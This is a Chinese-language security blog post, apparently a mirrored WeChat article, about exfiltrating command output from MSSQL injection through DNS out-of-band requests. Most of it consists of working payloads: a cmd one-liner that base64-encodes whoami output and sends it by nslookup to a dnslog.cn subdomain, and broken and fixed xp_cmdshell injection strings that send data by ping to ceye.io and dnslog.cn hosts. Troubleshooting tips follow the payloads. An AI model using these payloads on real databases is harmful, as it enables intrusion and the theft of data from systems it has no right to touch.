MSSQL注入DNS带外问题解决
2022-7-27 08:33:39 Author: 潇湘信安(查看原文) 阅读量:10 收藏
声明:该公众号大部分文章来自作者日常学习笔记,也有部分文章是经过作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。
请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。

攻防演练期间常见的dnslog平台可能已被防火墙或安全设备给标识了,如:dig.pm、ceye.io、dnslog.cn等、可以尝试去找一些小众dnslog或自建dnslog。

0x01 前言

朋友@Sin在“对某系统实战练手”这篇文章中看到这种MSSQL注入DNS带外数据的利用方式,但是他在本地复现时遇到了一些问题,所以找我帮着给测试一下,正好闲着没事就看了一下,并在解决这个问题后给他写了这篇记录文。

0x02 正文

我们先来看下原作者给出的DNS带外数据命令行版,可以直接执行并通过dnslog接收命令回显。继续来分析一下这条命令的参数和实现的功能吧,cmd参数说明如下。

  • /c:执行字符串指定的命令然后终止,

  • /v:使用 ! 作为分隔符启用延迟的环境变量。

cmd /v /c "whoami > temp && certutil -encode temp temp2 && findstr /L /V "CERTIFICATE" temp2 > temp3 && set /p MYVAR=< temp3 && set FINAL=!MYVAR!.xhwls9.dnslog.cn && nslookup !FINAL!"

1、执行whoami命令写入到temp文件中,并使用certutil命令进行base64编码到temp2文件。

whoami > temp && certutil -encode temp temp2
2、使用findstr命令在temp2文件中搜索不包含"CERTIFICATE"的行内容写入到temp3文件,/L参数:按字使用搜索字符串,/V参数:只打印不包含匹配的行。
findstr /L /V "CERTIFICATE" temp2 > temp3
3、MYVAR变量等于temp3文件内容,FINAL变量等于MYVAR.DNSLOG,最后用nslookup命令执行FINAL变量,没有nslookup时可用ping替代,执行这条命令时必须加上cmd /v参数。
cGVudGVzdC13aW4xMFxzaGFkb3c5DQo=.xhwls9.dnslog.cn
set /p MYVAR=< temp3 && set FINAL=!MYVAR!.xhwls9.dnslog.cn && nslookup !FINAL!"

使用原作者给出的MSSQL注入DNS带外数据Payoad时出现了下图中的报错,笔者根据这个报错进行了一系列的测试,最终修改出以下可执行Payload,可以自己去对比一下它们之间的差别在哪。

修改之前:

exec master..xp_cmdshell "whoami>C:\ProgramData\temp%26%26certutil -encode C:\ProgramData\temp C:\ProgramData\temp2%26%26findstr /L /V ""CERTIFICATE"" C:\ProgramData\temp2>C:\ProgramData\temp3";exec master..xp_cmdshell "cmd /v /c""set /p MYVAR=< C:\ProgramData\temp3 %26%26 set FINAL=!MYVAR!.xxx.ceye.io %26%26 ping !FINAL!""";exec master..xp_cmdshell "del ""C:\ProgramData\temp"" ""C:\ProgramData\temp2"" ""C:\ProgramData\temp3""";

修改之后:

exec master..xp_cmdshell 'whoami>C:\ProgramData\temp %26%26 certutil -encode C:\ProgramData\temp C:\ProgramData\temp1 %26%26 findstr /L /V "CERTIFICATE" C:\ProgramData\temp1>C:\ProgramData\temp2';exec master..xp_cmdshell "cmd /v /c""set /p MYVAR=< C:\ProgramData\temp2 %26%26 set FINAL=!MYVAR!.gnomur.dnslog.cn %26%26 ping !FINAL!""";exec master..xp_cmdshell 'del "C:\ProgramData\temp*"';

0x03 注意事项

  1. CMD命令行下执行时直接用&&连接即可,而在URL提交时必须将&&用Urlencode进行编码;

  2. 出现“开头的 标识符 太长。最大长度为 128”报错时可尝试将最外边的双引号改为单引号;
  3. 第一条语句用findstr搜索"CERTIFICATE"字符串时必须用双引号,否则可能找不到指定字符;
  4. 第一条语句注意查看temp2内容是否正确,如果不正确或为内容为空时将无法带出相关数据;
  5. 第二条语句必须加上cmd的/v参数,否则可能即使不出现报错也无法带出相关数据;
  6. 第二条语句最外边的引号必须用双引号,单引号即使不出现报错也无法带出相关数据。

关 注 有 礼

关注公众号回复“9527”可以领取一套HTB靶场文档和视频1208”个人常用高效爆破字典0221”2020年酒仙桥文章打包2191潇湘信安文章打包,“1212”杀软对比源码+数据源,0421Windows提权工具包

 还在等什么?赶紧点击下方名片关注学习吧!

推 荐 阅 读


文章来源: http://mp.weixin.qq.com/s?__biz=Mzg4NTUwMzM1Ng==&mid=2247497159&idx=2&sn=566983b5f6f211d47f56916c99eed87e&chksm=cfa551d4f8d2d8c2a8ba1425eda15393b8b7e639a2ac0f07e11c75ae38ec633f153ebfb0b569#rd
如有侵权请联系:admin#unsafe.sh